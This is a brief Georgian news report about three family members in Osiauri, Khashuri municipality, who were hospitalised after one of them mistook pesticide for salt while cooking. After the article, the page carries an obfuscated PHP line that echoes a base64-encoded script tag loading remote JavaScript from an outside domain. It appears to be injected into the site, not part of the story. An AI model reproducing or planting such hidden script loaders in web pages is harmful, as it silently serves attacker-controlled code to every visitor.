celsiusi
ავერსი შნაიდერი
ხაშურის მუნიციპალიტეტის სოფელ ოსიაურში, პესტიციდებით ოჯახის 3 წევრი მოიწამლა. ისინი ინტოქსიკაციის სიმპტომებით, ხაშურის ერთ-ერთ კლინიკაში მოათავსეს. ამის შესახებ ინფორმაციას ადგილობრივი მედია "მოზაიკა" ავრცელებს.
 
მედიის ინფორმაციით, ოჯახის ერთ-ერთმა წევრმა საჭმელში მარილის ნაცვლად შემთხვევით პესტიციდი ჩაყარა. ადგილობრივი კლინიკის ექიმის განცხადებით, პაციენტების მდგომარეობის დასტაბილურების შემდეგ ისინი დამატებითი კვლევებისთვის თბილისში გადაიყვანეს. 
 
ცნობისთვის, აღნიშნულ ნივთიერებას იყენებენ მცენარეთა მავნებლების, მარცვლეულის, შინაური ცხოველების ექტოპარაზიტების, აგრეთვე ადამიანისა და ცხოველის საშიშ დაავადებათა გადამტანების წინააღმდეგ საბრძოლველად.
1101
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");